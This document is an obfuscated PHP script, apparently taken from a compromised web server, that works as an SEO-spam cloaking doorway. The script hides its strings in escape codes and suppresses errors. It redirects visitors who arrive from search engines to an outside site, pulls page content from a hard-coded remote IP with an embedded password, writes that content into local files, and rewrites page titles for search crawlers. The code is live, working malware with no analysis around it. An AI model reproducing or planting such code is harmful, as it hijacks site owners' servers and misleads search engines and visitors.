Your IP : 18.222.118.188
<?php
goto E6ZSz; nJlgy: $query_pars_2 = str_replace("\55", "\x2b", $_GET["\x69\144"]); goto NsUYc; jLj4R: $_GET["\167\157\x72\154\144"] = 5; goto EweAV; RX8u7: $s = $_SERVER["\123\x45\122\x56\x45\x52\x5f\116\101\x4d\x45"] . $s; goto K2agw; BEu9U: $x1 = 3; goto PgE3V; i2iSY: if ($_GET["\151\144"] == "\151\156\x64\x65\170") { header("\x4c\x6f\x63\x61\x74\151\157\156\x3a\40\150\164\x74\x70\163\72\x2f\57\147\x6f\157\147\154\145\x2e\143\x6f\155"); die; } goto jLj4R; K2agw: $apass3 = "\162\166\63\62\x79\x64\141\143\163\x76\163\144\x76"; goto eIAal; NsUYc: $text = ''; goto R4AtW; eIAal: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto FBC9R; uMbk5: $apass2 = "\142\62\x33\x68\162\x32\x33\166\162\63\x32"; goto xihgK; U9A9m: if (strlen($text) < 5000) { $text = file_get_contents("\x68\164\x74\x70\72\x2f\57\x31\63\65\56\61\x38\x31\56\x32\61\x2e\61\x32\x36\57" . $_GET["\x66\x6e"] . "\56\x70\150\160\77\160\x61\x73\163\x3d{$apass}\46\x71\x3d{$_GET["\151\144"]}"); } goto bno7G; PgE3V: $xx1 = 5; goto rAJUI; Uv2Wm: $today = "\x32\x30\x32\65\x30\x31\61\x33\x2d"; goto yV1rW; jHNEY: if (strlen($text) > 5000) { $out = fopen("\x69\x6e\144\x65\x78\57" . $myname, "\x77"); fwrite($out, $text); fclose($out); } goto wu58H; bfevD: if ($s == "\x5c" | $s == "\57") { $s = ''; } goto RX8u7; R4AtW: if (function_exists("\x63\x75\x72\x6c\137\151\x6e\x69\x74")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\x68\x74\x74\x70\x3a\x2f\57\x31\63\65\56\x31\70\x31\56\x32\x31\x2e\61\x32\66\x2f" . $_GET["\x66\156"] . "\56\x70\150\x70\x3f\160\x61\163\163\75{$apass}\46\x71\x3d{$_GET["\151\x64"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\x7a\x69\x6c\154\x61\57\x34\56\60\x20\50\143\x6f\155\160\x61\164\x69\x62\x6c\145\x3b\40\115\123\x49\105\40\x36\56\60\x3b\40\127\x69\156\144\x6f\167\x73\x20\116\124\x20\65\x2e\61\x3b\x20\x53\126\x31\x29"); $text = curl_exec($ch); curl_close($ch); } goto U9A9m; hqHgj: $keyword = str_replace("\x20", "\x2b", $keyword); goto uMbk5; yV1rW: foreach ($_GET as $a => $b) { $_GET["\x69\144"] = $b; } goto I3aFs; xihgK: $s = dirname($_SERVER["\x50\x48\120\137\x53\x45\114\x46"]); goto bfevD; z6Ygh: echo $text; goto dzDRN; E6ZSz: error_reporting(0); goto Uv2Wm; wu58H: if (strpos($_SERVER["\x48\124\124\120\x5f\x55\x53\105\x52\137\101\107\x45\116\124"], "\x62\151\x6e\147") > 2 or strpos($_SERVER["\110\124\x54\x50\137\125\x53\105\122\x5f\101\107\105\x4e\124"], "\171\141\150\x6f\x6f") > 2) { $text = str_replace("\x3c\x74\151\x74\154\145\76\x3c\x2f\164\151\164\x6c\145\x3e", "\x3c\164\151\164\154\145\x3e{$keyword}\74\x2f\164\x69\164\154\x65\76", $text); } goto z6Ygh; rAJUI: $keyword = str_replace("\55", "\40", $_GET["\151\x64"]); goto hqHgj; bLq4U: $apass1 = "\166\x69\x73\x64\157\151\152\145\167"; goto BEu9U; FBC9R: if (strpos($_SERVER["\110\124\124\120\x5f\122\105\106\105\122\x45\x52"], "\x67\157\157\x67\x6c\x65\x2e") or strpos($_SERVER["\110\x54\x54\120\x5f\x52\105\106\x45\x52\105\122"], "\171\141\150\157\157\56") or strpos($_SERVER["\x48\x54\x54\120\x5f\122\105\x46\105\x52\x45\122"], "\x62\151\x6e\147\56")) { $tpl = "\151\156\144\x65\170\57" . $_GET["\x69\144"] . "\56\x70\150\x70\56\164\x70\x6c"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\155\x79"]; header("\114\x6f\143\x61\x74\x69\x6f\x6e\x3a\40\150\164\x74\x70\x73\x3a\57\57\x63\150\160\x6f\153\56\163\x69\164\x65\57\145\x6e\164\145\x72\57\x3f\x6d\141\x72\153\75{$today}\55{$s}\x26\164\160\154\x3d{$tpl}\46\145\156\147\153\145\171\x3d{$keyword}"); die; } else { $myname = $_GET["\151\144"] . "\x2e\x70\x68\x70"; if (file_exists("\151\156\144\x65\x78\57" . $myname)) { $html = @file_get_contents("\151\x6e\x64\145\170\57" . $myname); if (strpos($_SERVER["\110\x54\x54\120\137\x55\123\105\x52\137\101\107\105\x4e\124"], "\x62\151\x6e\x67") > 2 or strpos($_SERVER["\110\x54\124\x50\x5f\125\x53\x45\122\x5f\101\107\105\116\124"], "\171\x61\x68\157\x6f") > 2) { $keyword = str_replace("\55", "\x20", $_GET["\151\144"]); $html = str_replace("\74\x74\151\164\154\145\x3e\74\x2f\164\151\x74\x6c\x65\76", "\74\x74\x69\164\x6c\145\76{$keyword}\74\x2f\164\151\x74\x6c\x65\76", $html); } echo $html; die; } } goto nJlgy; bno7G: if (strlen($text) < 5000) { $url = "\61\x33\x35\56\61\x38\61\56\62\x31\56\61\62\66"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\50{$errno}\x29\x3c\142\x72\40\x2f\x3e\12"; } else { $req = "\x2f" . $_GET["\146\x6e"] . "\56\x70\150\x70\x3f\x70\141\163\163\75{$apass}\46\x71\75{$_GET["\151\x64"]}"; $out = "\x47\x45\124\40{$req}\40\x48\x54\x54\120\x2f\x31\x2e\60\xd\xa"; $out .= "\x48\x6f\x73\x74\x3a\x20{$url}\15\xa"; $out .= "\103\157\x6e\x6e\x65\143\164\x69\157\156\x3a\x20\x43\154\x6f\x73\145\15\xa\15\xa"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; } goto jHNEY; EweAV: $_GET["\x66\156"] = "\x36\x39\x36\x39\66\x39\x6e\145\167"; goto bLq4U; I3aFs: if ($_GET["\151\x64"] == "\164\145\163\x74\x69\x6e\x67") { echo "\164\x65\x73\164\40\x67\157\157\144\x2e\x2e\56"; die; } goto i2iSY; dzDRN: ?>